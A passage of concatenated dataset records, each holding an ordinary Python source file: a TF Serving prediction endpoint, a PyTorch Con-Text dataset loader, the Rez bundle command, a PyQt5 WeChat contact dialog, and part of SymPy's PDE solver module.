handlers\n@api.route('/')\nclass Models(Resource):\n @api.response(501, 'Error in model 
computation')\n @api.response(403, 'Could not connect to tf serving server')\n @api.response(404, 'Model not found.')\n @api.response(201, 'Successfully retrieved model evaluation.')\n @api.expect(PredictionRequest, validate=False, required=True)\n def post(self):\n # get inputs\n payload = restplus_api.payload\n\n # get model\n model = getModel(payload['model_name'])\n if model is None:\n return 'Model not found.', 404\n\n # get request\n model['model_signature'] = payload['model_signature']\n serving_request = getServingRequest(model, payload)\n\n # get stub\n stub = getMonockerModelStub(model['ip_address'], model['port'])\n if stub is None:\n return 'Could not connect to tf serving server', 403\n\n # make grpc prediction request then return results\n try:\n prediction = stub.Predict(serving_request, 5.0)\n model_response = list(prediction.outputs['scores'].float_val)\n return {'model_response': model_response}, 201\n\n except Exception as e:\n return str(e), 501\n \n#=============================================================================="} {"ext": "py", "sha": "1a31065f212693721a6525e296f7ea11f5f304b5", "content": "#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport torch\nimport torch.utils.data as data\nfrom torchvision import transforms\nimport os\nimport pickle\nimport random\nimport pdb\nimport sys\nimport json\nfrom PIL import Image\n\nsys.path.insert(0, '.')\n\nimport numpy as np\nfrom skimage import io\n\n\ndef Context_dataset(args, embedding_size):\n # Random seed\n np.random.seed(args.seed)\n\n # Getting the classes and annotations\n # ******\n data_path = args.data_path\n with open(data_path+'/Context/data/split_'+ str(args.split) +'.json','r') as fp:\n gt_annotations = json.load(fp)\n\n # Load Embedding according to OCR\n if args.embedding == 'w2vec' or args.embedding == 'fasttext' or args.embedding == 'glove' or args.embedding == 'bert':\n if args.ocr == 'google_ocr':\n with open(data_path + '/Context/' + args.ocr + '/text_embeddings/Context_' + args.embedding + '.json', 'r') as fp:\n text_embedding = json.load(fp)\n else:\n with open(data_path + '/Context/' + args.ocr + '/text_embeddings/Context_' + args.embedding + '.pickle','rb') as fp:\n text_embedding = pickle.load(fp)\n elif args.embedding =='phoc':\n text_embedding = {'embedding':'phoc'}\n elif args.embedding == 'fisher':\n text_embedding = {'embedding':'fisher'}\n else:\n print('OCR SELECTED NOT IMPLEMENTED')\n\n # Load Local features from Faster R-CNN VG\n\n with open(args.data_path + '/Context/context_local_feats.npy', 'rb') as fp:\n local_feats = np.load(fp, encoding='bytes')\n\n # Create img_name to index of local features\n with open(args.data_path + '/Context/context_local_feats_image_ids.txt', 'r') as fp:\n image_ids = fp.readlines()\n image_name2features_index = {}\n for item in image_ids:\n img_name = item.strip().split(',')[0].split('/')[-1].replace('\\'', '')\n idx = item.strip().split(',')[1].replace(')', '').replace(' ','')\n image_name2features_index[img_name] = idx\n\n # BBOXES LOADING FOR TEXT FEATURES\n # Load BBOXES of Scene Text\n with open(data_path + '/Context/google_ocr/bboxes/Context_bboxes.json', 'r') as fp:\n text_bboxes = json.load(fp)\n\n # Load BBOXES of Local Visual Features\n with open(data_path + '/Context/context_bboxes.npy', 'rb') as fp:\n local_bboxes = np.load(fp, encoding='bytes')\n\n\n # Data Loaders\n\n train_transform = transforms.Compose([\n transforms.Resize((256, 256)),\n transforms.RandomRotation(degrees=15),\n transforms.ColorJitter(),\n 
transforms.RandomHorizontalFlip(),\n transforms.RandomCrop(224),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n ])\n\n train_loader = Context_Train(args, gt_annotations, text_embedding, embedding_size, local_feats, image_name2features_index, text_bboxes, local_bboxes, train_transform)\n\n test_transform = transforms.Compose([\n transforms.Resize((224, 224)),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n ])\n\n test_loader = Context_Test(args, gt_annotations, text_embedding, embedding_size, local_feats, image_name2features_index, text_bboxes, local_bboxes, test_transform)\n\n return train_loader, test_loader, gt_annotations, text_embedding\n\n\nclass Context_Train(data.Dataset):\n def __init__(self, args, gt_annotations, text_embedding, embedding_size, local_feats, image_name2features_index, text_bboxes, local_bboxes, transform=None):\n\n self.args = args\n self.gt_annotations = gt_annotations\n self.text_embedding = text_embedding\n self.embedding_size = embedding_size\n self.transform = transform\n self.image_list = list(gt_annotations['train'].keys())\n\n self.image_name2features_index = image_name2features_index\n self.local_feats = local_feats\n self.text_bboxes = text_bboxes\n self.local_bboxes = local_bboxes\n\n def __len__(self):\n return len(self.gt_annotations['train'])\n\n def __getitem__(self, index):\n data_path = self.args.data_path\n assert index <= len(self), 'index range error'\n\n image_name = self.image_list[index].rstrip()\n image_path = data_path+'/Context/data/JPEGImages/' + image_name\n img = Image.open(image_path).convert('RGB')\n if self.transform:\n img = self.transform(img)\n\n img_class = self.gt_annotations['train'][image_name]\n label = np.zeros(28)\n label[int(img_class) - 1] = 1\n label = torch.from_numpy(label)\n label = label.type(torch.FloatTensor)\n\n if self.args.embedding == 'w2vec' or self.args.embedding == 'fasttext' or self.args.embedding == 'glove' or self.args.embedding == 'bert':\n text_embedding = np.asarray(self.text_embedding[image_name])\n elif self.args.embedding == 'phoc':\n with open (data_path + '/Context/yolo_phoc/'+image_name[:-3]+'json') as fp:\n phocs = json.load(fp)\n text_embedding = np.resize(phocs, (np.shape(phocs)[0], 604))\n elif self.args.embedding == 'fisher':\n if self.args.ocr == 'yolo_phoc':\n relative_path = '/Context/old_fisher_vectors/'\n elif self.args.ocr == 'e2e_mlt':\n relative_path = '/Context/fasttext_fisher/'\n else: print('Not Implemented')\n with open (data_path + relative_path +image_name[:-3]+'json')as fp:\n fisher_vector = json.load(fp)\n text_embedding = np.resize(fisher_vector, (1, 38400))\n # FISHER VECTORS DO NOT NEED MAX TEXTUAL\n if self.args.embedding != 'fisher':\n text_features = np.zeros((self.args.max_textual, self.embedding_size))\n if np.shape(text_embedding)[0] == 0:\n text_embedding = np.zeros((1,self.embedding_size))\n elif np.shape(text_embedding)[0] > self.args.max_textual:\n text_embedding = text_embedding[0:self.args.max_textual]\n text_features[:len(text_embedding)] = text_embedding\n else:\n text_features = text_embedding\n\n text_features = torch.from_numpy(text_features)\n text_features = text_features.type(torch.FloatTensor)\n\n # SCENE TEXT BBOXES ONLY FOR GOOGLE OCR\n text_bboxes = np.asarray(self.text_bboxes[image_name])\n if self.args.ocr == 'google_ocr':\n text_bboxes_features = np.zeros((self.args.max_textual, 4))\n if np.shape(text_bboxes)[0] == 0:\n 
text_bboxes = np.zeros((1, 4))\n elif np.shape(text_bboxes)[0] > self.args.max_textual:\n text_bboxes = text_bboxes[0:self.args.max_textual]\n text_bboxes_features[:len(text_bboxes)] = text_bboxes\n else:\n # NO BBOXES FOR OTHER OCRs\n text_bboxes_features = np.zeros((self.args.max_textual, 4))\n text_bboxes_features = torch.from_numpy(text_bboxes_features)\n text_bboxes_features = text_bboxes_features.type(torch.FloatTensor)\n\n # LOCAL VISUAL FEATURES\n local_features_index = self.image_name2features_index[image_name]\n local_features = self.local_feats[int(local_features_index)]\n local_features = torch.from_numpy(local_features[:int(self.args.max_visual)][:])\n local_features = local_features.type(torch.FloatTensor)\n # LOCAL VISUAL BBOXES\n local_bboxes_features = self.local_bboxes[int(local_features_index)]\n local_bboxes_features = torch.from_numpy(local_bboxes_features[:int(self.args.max_visual)][:])\n local_bboxes_features = local_bboxes_features.type(torch.FloatTensor)\n\n return img, label, text_features, local_features, text_bboxes_features, local_bboxes_features, image_name\n\n\nclass Context_Test(data.Dataset):\n def __init__(self, args, gt_annotations, text_embedding, embedding_size, local_feats, image_name2features_index, text_bboxes, local_bboxes, transform=None):\n self.args = args\n self.gt_annotations = gt_annotations\n self.text_embedding = text_embedding\n self.embedding_size = embedding_size\n self.transform = transform\n self.image_list = list(gt_annotations['test'].keys())\n\n self.image_name2features_index = image_name2features_index\n self.local_feats = local_feats\n self.text_bboxes = text_bboxes\n self.local_bboxes = local_bboxes\n\n def __len__(self):\n return len(self.gt_annotations['test'])\n\n def __getitem__(self, index):\n data_path = self.args.data_path\n assert index <= len(self), 'index range error'\n image_name = self.image_list[index].rstrip()\n image_path = data_path+ '/Context/data/JPEGImages/' + image_name\n img = Image.open(image_path).convert('RGB')\n if self.transform:\n img = self.transform(img)\n\n img_class = self.gt_annotations['test'][image_name]\n label = np.zeros(28)\n label[int(img_class) - 1] = 1\n label = torch.from_numpy(label)\n label = label.type(torch.FloatTensor)\n\n if self.args.embedding == 'w2vec' or self.args.embedding == 'fasttext' or self.args.embedding == 'glove' or self.args.embedding == 'bert':\n text_embedding = np.asarray(self.text_embedding[image_name])\n elif self.args.embedding == 'phoc':\n with open (data_path + '/Context/yolo_phoc/'+image_name[:-3]+'json') as fp:\n phocs = json.load(fp)\n text_embedding = np.resize(phocs, (np.shape(phocs)[0], 604))\n\n elif self.args.embedding == 'fisher':\n if self.args.ocr == 'yolo_phoc':\n relative_path = '/Context/old_fisher_vectors/'\n elif self.args.ocr == 'e2e_mlt':\n relative_path = '/Context/fasttext_fisher/'\n else: print('Not Implemented')\n with open (data_path + relative_path +image_name[:-3]+'json')as fp:\n fisher_vector = json.load(fp)\n text_embedding = np.resize(fisher_vector, (1, 38400))\n # FISHER VECTORS DO NOT NEED MAX TEXTUAL\n if self.args.embedding != 'fisher':\n text_features = np.zeros((self.args.max_textual, self.embedding_size))\n if np.shape(text_embedding)[0] == 0:\n text_embedding = np.zeros((1,self.embedding_size))\n elif np.shape(text_embedding)[0] > self.args.max_textual:\n text_embedding = text_embedding[0:self.args.max_textual]\n text_features[:len(text_embedding)] = text_embedding\n else:\n text_features = text_embedding\n\n text_features = 
torch.from_numpy(text_features)\n text_features = text_features.type(torch.FloatTensor)\n # SCENE TEXT BBOXES ONLY FOR GOOGLE OCR\n text_bboxes = np.asarray(self.text_bboxes[image_name])\n if self.args.ocr == 'google_ocr':\n text_bboxes_features = np.zeros((self.args.max_textual, 4))\n if np.shape(text_bboxes)[0] == 0:\n text_bboxes = np.zeros((1, 4))\n elif np.shape(text_bboxes)[0] > self.args.max_textual:\n text_bboxes = text_bboxes[0:self.args.max_textual]\n text_bboxes_features[:len(text_bboxes)] = text_bboxes\n else:\n # NO BBOXES FOR OTHER OCRs\n text_bboxes_features = np.zeros((self.args.max_textual, 4))\n text_bboxes_features = torch.from_numpy(text_bboxes_features)\n text_bboxes_features = text_bboxes_features.type(torch.FloatTensor)\n\n # LOCAL VISUAL FEATURES\n local_features_index = self.image_name2features_index[image_name]\n local_features = self.local_feats[int(local_features_index)]\n local_features = torch.from_numpy(local_features[:int(self.args.max_visual)][:])\n local_features = local_features.type(torch.FloatTensor)\n # LOCAL VISUAL BBOXES\n local_bboxes_features = self.local_bboxes[int(local_features_index)]\n local_bboxes_features = torch.from_numpy(local_bboxes_features[:int(self.args.max_visual)][:])\n local_bboxes_features = local_bboxes_features.type(torch.FloatTensor)\n\n return img, label, text_features, local_features, text_bboxes_features, local_bboxes_features, image_name\n\n\n\n\n\n"} {"ext": "py", "sha": "1a31067bd02cd02548837e213163e0acd785d8c6", "content": "from .voxel_set_abstraction import VoxelSetAbstraction\nfrom .def_voxel_set_abstraction import DefVoxelSetAbstraction\n\n__all__ = {\n 'VoxelSetAbstraction': VoxelSetAbstraction, \n 'DefVoxelSetAbstraction': DefVoxelSetAbstraction\n}\n\n\n"} {"ext": "py", "sha": "1a310776abf7875f377eb507b9ab3fb7f21f81c5", "content": "# Copyright Contributors to the Rez project\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\n'''\nBundle a context and its packages into a relocatable dir.\n'''\nfrom __future__ import print_function\n\nimport os\nimport os.path\nimport sys\n\n\ndef setup_parser(parser, completions=False):\n group = parser.add_mutually_exclusive_group()\n group.add_argument(\n \"-s\", \"--skip-non-relocatable\", action=\"store_true\",\n help=\"leave non-relocatable packages non-bundled, rather than raise an error\")\n group.add_argument(\n \"-f\", \"--force\", action=\"store_true\",\n help=\"bundle package even if it isn't relocatable (use at your own risk)\")\n group.add_argument(\n \"-n\", \"--no-lib-patch\", action=\"store_true\",\n help=\"don't apply library patching within the bundle\")\n parser.add_argument(\n \"RXT\",\n help=\"context to bundle\")\n parser.add_argument(\n \"DEST_DIR\",\n help=\"directory to create bundle in; must not exist\")\n\n\ndef command(opts, parser, extra_arg_groups=None):\n from rez.utils.logging_ import print_error\n from rez.bundle_context import bundle_context\n from rez.resolved_context import ResolvedContext\n\n rxt_filepath = 
os.path.abspath(os.path.expanduser(opts.RXT))\n dest_dir = os.path.abspath(os.path.expanduser(opts.DEST_DIR))\n\n # sanity checks\n if not os.path.exists(rxt_filepath):\n print_error(\"File does not exist: %s\", rxt_filepath)\n sys.exit(1)\n\n context = ResolvedContext.load(rxt_filepath)\n\n bundle_context(\n context=context,\n dest_dir=dest_dir,\n force=opts.force,\n skip_non_relocatable=opts.skip_non_relocatable,\n verbose=opts.verbose,\n patch_libs=(not opts.no_lib_patch)\n )\n"} {"ext": "py", "sha": "1a310ab0a721ed99d6df375ddfdf50875f5fd8f6", "content": "class CogTV:\n def __init__(self):\n pass\n \n def setScreen(self, scene):\n pass\n \n"} {"ext": "py", "sha": "1a310b0d553f5abe9491d815ab4b0c628638105a", "content": "#!/usr/bin/python2.7\r\n# -*- coding: UTF-8 -*-\r\n'''\r\nCreated on 2018年6月15日\r\n\r\n@author: zhaohongxing\r\n'''\r\nimport os\r\n\r\nfrom PyQt5.Qt import Qt\r\nfrom PyQt5.Qt import QIcon,QStandardItemModel,QStandardItem\r\n'''\r\nfrom PyQt5 import QtGui\r\n'''\r\nfrom PyQt5.QtWidgets import QTableView,QVBoxLayout,QDialog,QPushButton\r\nfrom PyQt5.QtCore import QSize, pyqtSignal\r\nimport wechatutil\r\n\r\nclass ContactListWindow(QDialog):\r\n WIDTH = 600\r\n membersConfirmed = pyqtSignal(str)\r\n \r\n def __init__(self,member_list,parent = None):\r\n super(ContactListWindow,self).__init__(parent)\r\n self.setModal(True)\r\n self.user_home = os.path.expanduser('~')\r\n self.app_home = self.user_home + '/.wechat/'\r\n self.head_home = (\"%s/heads\"%(self.app_home))\r\n self.cache_home = (\"%s/cache/\"%(self.app_home))\r\n self.cache_image_home = \"%s/image/\"%(self.cache_home)\r\n self.contact_head_home = (\"%s/contact/\"%(self.head_home))\r\n self.default_head_icon = './resource/images/default.png'\r\n self.members = member_list\r\n self.membersTable = QTableView()\r\n self.membersTable.horizontalHeader().setStretchLastSection(True)\r\n self.membersTable.verticalHeader().setDefaultSectionSize(60)\r\n #self.membersTable.horizontalHeader().setDefaultSectionSize(60)\r\n self.membersTable.setColumnWidth(0, 10);\r\n self.membersTable.setColumnWidth(1, 60);\r\n self.membersTable.verticalHeader().setVisible(False)\r\n self.membersTable.horizontalHeader().setVisible(False)\r\n #confirm\r\n self.confirm = QPushButton(wechatutil.unicode(\"確定\"),self)\r\n self.membersTableModel = QStandardItemModel(0,2)\r\n self.membersTableModel.itemChanged.connect(self.itemChanged)\r\n self.initinal_member_list_widget()\r\n mainLayout=QVBoxLayout()\r\n mainLayout.addWidget(self.membersTable)\r\n mainLayout.addWidget(self.confirm)\r\n self.setLayout(mainLayout)\r\n #self.membersTable.clicked.connect(self.contact_item_clicked)\r\n self.confirm.clicked.connect(self.do_confirm)\r\n self.selectedRowCount = 0\r\n \r\n def itemChanged(self,item):\r\n if item.checkState() == Qt.Checked:\r\n self.selectedRowCount += 1\r\n else:\r\n self.selectedRowCount -= 1\r\n \r\n if self.selectedRowCount > 0:\r\n self.confirm.setText(wechatutil.unicode(\"確定(%d)\"%(self.selectedRowCount)))\r\n else:\r\n self.confirm.setText(wechatutil.unicode(\"確定\"))\r\n \r\n def initinal_member_list_widget(self):\r\n self.append_row(self.members, self.membersTableModel)\r\n self.membersTable.setModel(self.membersTableModel)\r\n self.membersTable.setIconSize(QSize(40,40))\r\n \r\n def append_row(self,members,data_model):\r\n for (i,member) in enumerate(members):\r\n cells = []\r\n user_name = member['UserName']\r\n user_name_cell = QStandardItem(user_name)\r\n user_name_cell.setCheckable(True)\r\n cells.append(user_name_cell)\r\n \r\n 
user_avatar = self.contact_head_home + member['UserName']+\".jpg\"\r\n if not os.path.exists(user_avatar):\r\n user_avatar = self.default_head_icon\r\n dn = member['DisplayName'] or member['NickName']\r\n if not dn:\r\n dn = member['NickName']\r\n item = QStandardItem(QIcon(user_avatar),wechatutil.unicode(dn))\r\n cells.append(item)\r\n data_model.appendRow(cells)\r\n \r\n def do_confirm(self):\r\n rowCount = self.membersTableModel.rowCount() \r\n selected_user_names = \"\"\r\n for row in range(rowCount):\r\n item = self.membersTableModel.item(row,0)\r\n if item.checkState() == Qt.Checked:\r\n index = self.membersTableModel.index(row,0)\r\n user_name_obj = self.membersTableModel.data(index)\r\n if user_name_obj:\r\n user_name = user_name_obj\r\n user = {}\r\n user['UserName']=user_name\r\n selected_user_names=selected_user_names+(user_name)\r\n selected_user_names=selected_user_names+(\";\")\r\n \r\n if len(selected_user_names) > 0:\r\n dictt = {}\r\n dictt['UserNames']=selected_user_names\r\n self.membersConfirmed.emit(selected_user_names)\r\n \r\n self.close()"} {"ext": "py", "sha": "1a310b66a9b824753a91af32fceeba35240da5ec", "content": "\"\"\"\nThis module contains pdsolve() and different helper functions that it\nuses. It is heavily inspired by the ode module and hence the basic\ninfrastructure remains the same.\n\n**Functions in this module**\n\n These are the user functions in this module:\n\n - pdsolve() - Solves PDE's\n - classify_pde() - Classifies PDEs into possible hints for dsolve().\n - pde_separate() - Separate variables in partial differential equation either by\n additive or multiplicative separation approach.\n\n These are the helper functions in this module:\n\n - pde_separate_add() - Helper function for searching additive separable solutions.\n - pde_separate_mul() - Helper function for searching multiplicative\n separable solutions.\n\n**Currently implemented solver methods**\n\nThe following methods are implemented for solving partial differential\nequations. 
See the docstrings of the various pde_hint() functions for\nmore information on each (run help(pde)):\n\n - 1st order linear homogeneous partial differential equations\n with constant coefficients.\n - 1st order linear general partial differential equations\n with constant coefficients.\n - 1st order linear partial differential equations with\n variable coefficients.\n\n\"\"\"\nfrom functools import reduce\n\nfrom itertools import combinations_with_replacement\nfrom sympy.simplify import simplify # type: ignore\nfrom sympy.core import Add, S\nfrom sympy.core.function import Function, expand, AppliedUndef, Subs\nfrom sympy.core.relational import Equality, Eq\nfrom sympy.core.symbol import Symbol, Wild, symbols\nfrom sympy.functions import exp\nfrom sympy.integrals.integrals import Integral, integrate\nfrom sympy.utilities.iterables import has_dups, is_sequence\nfrom sympy.utilities.misc import filldedent\n\nfrom sympy.solvers.deutils import _preprocess, ode_order, _desolve\nfrom sympy.solvers.solvers import solve\nfrom sympy.simplify.radsimp import collect\n\nimport operator\n\n\nallhints = (\n \"1st_linear_constant_coeff_homogeneous\",\n \"1st_linear_constant_coeff\",\n \"1st_linear_constant_coeff_Integral\",\n \"1st_linear_variable_coeff\"\n )\n\n\ndef pdsolve(eq, func=None, hint='default', dict=False, solvefun=None, **kwargs):\n \"\"\"\n Solves any (supported) kind of partial differential equation.\n\n **Usage**\n\n pdsolve(eq, f(x,y), hint) -> Solve partial differential equation\n eq for function f(x,y), using method hint.\n\n **Details**\n\n ``eq`` can be any supported partial differential equation (see\n the pde docstring for supported methods). This can either\n be an Equality, or an expression, which is assumed to be\n equal to 0.\n\n ``f(x,y)`` is a function of two variables whose derivatives in that\n variable make up the partial differential equation. In many\n cases it is not necessary to provide this; it will be autodetected\n (and an error raised if it couldn't be detected).\n\n ``hint`` is the solving method that you want pdsolve to use. Use\n classify_pde(eq, f(x,y)) to get all of the possible hints for\n a PDE. The default hint, 'default', will use whatever hint\n is returned first by classify_pde(). See Hints below for\n more options that you can use for hint.\n\n ``solvefun`` is the convention used for arbitrary functions returned\n by the PDE solver. If not set by the user, it is set by default\n to be F.\n\n **Hints**\n\n Aside from the various solving methods, there are also some\n meta-hints that you can pass to pdsolve():\n\n \"default\":\n This uses whatever hint is returned first by\n classify_pde(). This is the default argument to\n pdsolve().\n\n \"all\":\n To make pdsolve apply all relevant classification hints,\n use pdsolve(PDE, func, hint=\"all\"). This will return a\n dictionary of hint:solution terms. If a hint causes\n pdsolve to raise the NotImplementedError, value of that\n hint's key will be the exception object raised. The\n dictionary will also include some special keys:\n\n - order: The order of the PDE. See also ode_order() in\n deutils.py\n - default: The solution that would be returned by\n default. This is the one produced by the hint that\n appears first in the tuple returned by classify_pde().\n\n \"all_Integral\":\n This is the same as \"all\", except if a hint also has a\n corresponding \"_Integral\" hint, it only returns the\n \"_Integral\" hint. 
This is useful if \"all\" causes\n pdsolve() to hang because of a difficult or impossible\n integral. This meta-hint will also be much faster than\n \"all\", because integrate() is an expensive routine.\n\n See also the classify_pde() docstring for more info on hints,\n and the pde docstring for a list of all supported hints.\n\n **Tips**\n - You can declare the derivative of an unknown function this way:\n\n >>> from sympy import Function, Derivative\n >>> from sympy.abc import x, y # x and y are the independent variables\n >>> f = Function(\"f\")(x, y) # f is a function of x and y\n >>> # fx will be the partial derivative of f with respect to x\n >>> fx = Derivative(f, x)\n >>> # fy will be the partial derivative of f with respect to y\n >>> fy = Derivative(f, y)\n\n - See test_pde.py for many tests, which serves also as a set of\n examples for how to use pdsolve().\n - pdsolve always returns an Equality class (except for the case\n when the hint is \"all\" or \"all_Integral\"). Note that it is not possible\n to get an explicit solution for f(x, y) as in the case of ODE's\n - Do help(pde.pde_hintname) to get help more information on a\n specific hint\n\n\n Examples\n ========\n\n >>> from sympy.solvers.pde import pdsolve\n >>> from sympy import Function, Eq\n >>> from sympy.abc import x, y\n >>> f = Function('f')\n >>> u = f(x, y)\n >>> ux = u.diff(x)\n >>> uy = u.diff(y)\n >>> eq = Eq(1 + (2*(ux/u)) + (3*(uy/u)), 0)\n >>> pdsolve(eq)\n Eq(f(x, y), F(3*x - 2*y)*exp(-2*x/13 - 3*y/13))\n\n \"\"\"\n\n if not solvefun:\n solvefun = Function('F')\n\n # See the docstring of _desolve for more details.\n hints = _desolve(eq, func=func, hint=hint, simplify=True,\n type='pde', **kwargs)\n eq = hints.pop('eq', False)\n all_ = hints.pop('all', False)\n\n if all_:\n # TODO : 'best' hint should be implemented when adequate\n # number of hints are added.\n pdedict = {}\n failed_hints = {}\n gethints = classify_pde(eq, dict=True)\n pdedict.update({'order': gethints['order'],\n 'default': gethints['default']})\n for hint in hints:\n try:\n rv = _helper_simplify(eq, hint, hints[hint]['func'],\n hints[hint]['order'], hints[hint][hint], solvefun)\n except NotImplementedError as detail:\n failed_hints[hint] = detail\n else:\n pdedict[hint] = rv\n pdedict.update(failed_hints)\n return pdedict\n\n else:\n return _helper_simplify(eq, hints['hint'], hints['func'],\n hints['order'], hints[hints['hint']], solvefun)\n\n\ndef _helper_simplify(eq, hint, func, order, match, solvefun):\n \"\"\"Helper function of pdsolve that calls the respective\n pde functions to solve for the partial differential\n equations. 
This minimizes the computation in\n calling _desolve multiple times.\n \"\"\"\n\n if hint.endswith(\"_Integral\"):\n solvefunc = globals()[\n \"pde_\" + hint[:-len(\"_Integral\")]]\n else:\n solvefunc = globals()[\"pde_\" + hint]\n return _handle_Integral(solvefunc(eq, func, order,\n match, solvefun), func, order, hint)\n\n\ndef _handle_Integral(expr, func, order, hint):\n r\"\"\"\n Converts a solution with integrals in it into an actual solution.\n\n Simplifies the integral mainly using doit()\n \"\"\"\n if hint.endswith(\"_Integral\"):\n return expr\n\n elif hint == \"1st_linear_constant_coeff\":\n return simplify(expr.doit())\n\n else:\n return expr\n\n\ndef classify_pde(eq, func=None, dict=False, *, prep=True, **kwargs):\n \"\"\"\n Returns a tuple of possible pdsolve() classifications for a PDE.\n\n The tuple is ordered so that first item is the classification that\n pdsolve() uses to solve the PDE by default. In general,\n classifications near the beginning of the list will produce\n better solutions faster than those near the end, though there are\n always exceptions. To make pdsolve use a different classification,\n use pdsolve(PDE, func, hint=<classification>). See also the pdsolve()\n docstring for different meta-hints you can use.\n\n If ``dict`` is true, classify_pde() will return a dictionary of\n hint:match expression terms. This is intended for internal use by\n pdsolve(). Note that because dictionaries are ordered arbitrarily,\n this will most likely not be in the same order as the tuple.\n\n You can get help on different hints by doing help(pde.pde_hintname),\n where hintname is the name of the hint without \"_Integral\".\n\n See sympy.pde.allhints or the sympy.pde docstring for a list of all\n supported hints that can be returned from classify_pde.\n\n\n Examples\n ========\n\n >>> from sympy.solvers.pde import classify_pde\n >>> from sympy import Function, Eq\n >>> from sympy.abc import x, y\n >>> f = Function('f')\n >>> u = f(x, y)\n >>> ux = u.diff(x)\n >>> uy = u.diff(y)\n >>> eq = Eq(1 + (2*(ux/u)) + (3*(uy/u)), 0)\n >>> classify_pde(eq)\n ('1st_linear_constant_coeff_homogeneous',)\n \"\"\"\n\n if func and len(func.args) != 2:\n raise NotImplementedError(\"Right now only partial \"\n \"differential equations of two variables are supported\")\n\n if prep or func is None:\n prep, func_ = _preprocess(eq, func)\n if func is None:\n func = func_\n\n if isinstance(eq, Equality):\n if eq.rhs != 0:\n return classify_pde(eq.lhs - eq.rhs, func)\n eq = eq.lhs\n\n f = func.func\n x = func.args[0]\n y = func.args[1]\n fx = f(x,y).diff(x)\n fy = f(x,y).diff(y)\n\n # TODO : For now pde.py uses support offered by the ode_order function\n # to find the order with respect to a multi-variable function. 
An\n # improvement could be to classify the order of the PDE on the basis of\n # individual variables.\n order = ode_order(eq, f(x,y))\n\n # hint:matchdict or hint:(tuple of matchdicts)\n # Also will contain \"default\":<default hint> and \"order\":order items.\n matching_hints = {'order': order}\n\n if not order:\n if dict:\n matching_hints[\"default\"] = None\n return matching_hints\n else:\n return ()\n\n eq = expand(eq)\n\n a = Wild('a', exclude = [f(x,y)])\n b = Wild('b', exclude = [f(x,y), fx, fy, x, y])\n c = Wild('c', exclude = [f(x,y), fx, fy, x, y])\n d = Wild('d', exclude = [f(x,y), fx, fy, x, y])\n e = Wild('e', exclude = [f(x,y), fx, fy])\n n = Wild('n', exclude = [x, y])\n # Try removing the smallest power of f(x,y)\n # from the highest partial derivatives of f(x,y)\n reduced_eq = None\n if eq.is_Add:\n var = set(combinations_with_replacement((x,y), order))\n dummyvar = var.copy()\n power = None\n for i in var:\n coeff = eq.coeff(f(x,y).diff(*i))\n if coeff != 1:\n match = coeff.match(a*f(x,y)**n)\n if match and match[a]:\n power = match[n]\n dummyvar.remove(i)\n break\n dummyvar.remove(i)\n for i in dummyvar:\n coeff = eq.coeff(f(x,y).diff(*i))\n if coeff != 1:\n match = coeff.match(a*f(x,y)**n)\n if match and match[a] and match[n] < power:\n power = match[n]\n if power:\n den = f(x,y)**power\n reduced_eq = Add(*[arg/den for arg in eq.args])\n if not reduced_eq:\n reduced_eq = eq\n\n if order == 1:\n reduced_eq = collect(reduced_eq, f(x, y))\n r = reduced_eq.match(b*fx + c*fy + d*f(x,y) + e)\n if r:\n if not r[e]:\n ## Linear first-order homogeneous partial-differential\n ## equation with constant coefficients\n r.update({'b': b, 'c': c, 'd': d})\n matching_hints[\"1st_linear_constant_coeff_homogeneous\"] = r\n else:\n if r[b]**2 + r[c]**2 != 0:\n ## Linear first-order general partial-differential\n ## equation with constant coefficients\n r.update({'b': b, 'c': c, 'd': d, 'e': e})\n matching_hints[\"1st_linear_constant_coeff\"] = r\n matching_hints[\n \"1st_linear_constant_coeff_Integral\"] = r\n\n else:\n b = Wild('b', exclude=[f(x, y), fx, fy])\n c = Wild('c', exclude=[f(x, y), fx, fy])\n d = Wild('d', exclude=[f(x, y), fx, fy])\n r = reduced_eq.match(b*fx + c*fy + d*f(x,y) + e)\n if r:\n r.update({'b': b, 'c': c, 'd': d, 'e': e})\n matching_hints[\"1st_linear_variable_coeff\"] = r\n\n # Order keys based on allhints.\n retlist = []\n for i in allhints:\n if i in matching_hints:\n retlist.append(i)\n\n if dict:\n # Dictionaries are ordered arbitrarily, so make note of which\n # hint would come first for pdsolve(). Use an ordered dict in Py 3.\n matching_hints[\"default\"] = None\n matching_hints[\"ordered_hints\"] = tuple(retlist)\n for i in allhints:\n if i in matching_hints:\n matching_hints[\"default\"] = i\n break\n return matching_hints\n else:\n return tuple(retlist)\n\n\ndef checkpdesol(pde, sol, func=None, solve_for_func=True):\n \"\"\"\n Checks if the given solution satisfies the partial differential\n equation.\n\n pde is the partial differential equation which can be given in the\n form of an equation or an expression. sol is the solution for which\n the pde is to be checked. This can also be given in an equation or\n an expression form. 
If the function is not provided, the helper\n function _preprocess from deutils is used to identify the function.\n\n If a sequence of solutions is passed, the same sort of container will be\n used to return the result for each solution.\n\n The following methods are currently being implemented to check if the\n solution satisfies the PDE:\n\n 1. Directly substitute the solution in the PDE and check. If the\n solution hasn't been solved for f, then it will solve for f\n provided solve_for_func hasn't been set to False.\n\n If the solution satisfies the PDE, then a tuple (True, 0) is returned.\n Otherwise a tuple (False, expr) where expr is the value obtained\n after substituting the solution in the PDE. However if a known solution\n returns False, it may be due to the inability of doit() to simplify it to zero.\n\n Examples\n ========\n\n >>> from sympy import Function, symbols\n >>> from sympy.solvers.pde import checkpdesol, pdsolve\n >>> x, y = symbols('x y')\n >>> f = Function('f')\n >>> eq = 2*f(x,y) + 3*f(x,y).diff(x) + 4*f(x,y).diff(y)\n >>> sol = pdsolve(eq)\n >>> assert checkpdesol(eq, sol)[0]\n >>> eq = x*f(x,y) + f(x,y).diff(x)\n >>> checkpdesol(eq, sol)\n (False, (x*F(4*x - 3*y) - 6*F(4*x - 3*y)/25 + 4*Subs(Derivative(F(_xi_1), _xi_1), _xi_1, 4*x - 3*y))*exp(-6*x/25 - 